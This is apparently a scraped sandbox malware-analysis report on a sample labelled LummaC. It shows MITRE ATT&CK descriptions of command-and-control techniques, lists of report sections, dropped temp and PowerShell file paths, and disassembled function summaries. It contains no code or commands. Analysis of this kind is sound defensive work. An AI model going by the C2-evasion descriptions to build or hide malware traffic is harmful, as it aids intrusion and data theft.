Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

Memory Dumps

Sigma Signatures

System Summary

Data Obfuscation

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\RESD8A4.tmp

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_353e4xkt.405.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_aw4gxtga.n3x.psm1

C:\Users\user\AppData\Local\Temp\uy2pimwz\CSCE5E1F75A70734430B929D7B25FACB84F.TMP

C:\Users\user\AppData\Local\Temp\uy2pimwz\uy2pimwz.0.cs

C:\Users\user\AppData\Local\Temp\uy2pimwz\uy2pimwz.cmdline

C:\Users\user\AppData\Local\Temp\uy2pimwz\uy2pimwz.dll

C:\Users\user\AppData\Local\Temp\uy2pimwz\uy2pimwz.out

Static File Info

General

File Icon

Static PE Info

General

Windows Analysis Report
file.exe

Function 00B75BF0 Relevance: 70.7, APIs: 27, Strings: 13, Instructions: 675
memorylibraryloaderCOMMON

Function 009AEA80 Relevance: 37.4, APIs: 18, Strings: 3, Instructions: 641
memoryCOMMON

Function 009AC080 Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 115
pipeCOMMON

Function 009B3200 Relevance: 12.7, APIs: 8, Instructions: 685
memoryCOMMON

Function 00713220 Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 446
memoryCOMMON

Function 00A33370 Relevance: 44.1, APIs: 15, Strings: 10, Instructions: 375
memoryCOMMON

Function 00B75C70 Relevance: 38.8, APIs: 12, Strings: 10, Instructions: 284
libraryloaderCOMMON

Function 007D8B20 Relevance: 26.6, APIs: 5, Strings: 10, Instructions: 300
memorythreadCOMMON

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre